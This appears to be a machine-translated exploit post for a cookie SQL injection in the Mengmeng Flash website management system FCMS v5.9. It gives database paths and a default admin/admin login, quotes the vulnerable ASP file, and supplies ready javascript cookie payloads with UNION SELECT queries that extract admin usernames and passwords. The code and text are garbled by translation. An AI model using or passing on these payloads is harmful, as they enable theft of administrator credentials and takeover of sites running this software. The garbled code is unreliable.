Mengmeng Flash website management system FCMS v5.9 cookie Injection

Database address: xmlEditor/database/#####@ datas. xmleditor/login in the mdb background. asp admin/admin message Database: guestbook/db/sywl. asp cookie injection vulnerability file: xml/text. asp code: -------------------------- <! -# Include file = ".. /conn. asp "-> // contains the filtered get and post files, but the cookie <% flowNo = Request (" flowNo ") is ignored ") // get Request not only get and post Oh ~~! If flowNo <> "" then // if flowNo is not equal to null, run it down ~! Set rs = server. createObject ("ADODB. recordSet ") rs. source = "select * from xmlContent where flowNo =" & flowNors. open rs. source, conn, // xml syntax, the burst information appears in the title ~! Response. Write "<? Xml version = '1. 0' encoding = 'utf-8'?>" & Chr (13) Response. Write "<main>" & chr (13) Response. Write "<title> <! [CDATA ["Response. Write rs (" tx ") Response. Write"]> </title> "& chr (13) Response. Write" <text> <! [CDATA ["Response. write rs ("description") Response. write "]> </text>" & chr (13) rs. closeSet rs = nothingconn. closeSet conn = nothingResponse. write "</main>" end if %> In fact, this cookie injection vulnerability is found in the root directory new. the asp file also exists, but it is inconvenient to use, and there are custom jumps to the homepage == ~! However, there is no jump in the text. asp file, so it is convenient to use it ~! EXP: javascript: alert (document. cookie = "flowNo =" + escape ("14 union select 1, 2, 3, adminname from XmlAdmin"); javascript: alert (document. cookie = "flowNo =" + escape ("14 union select 1, 2, 3, adminpwd from XmlAdmin"); PS: note that this EXP vulnerability is not on the page, the page is blank, and the account and password are displayed in the title, that is, the title ~! Please observe carefully ~!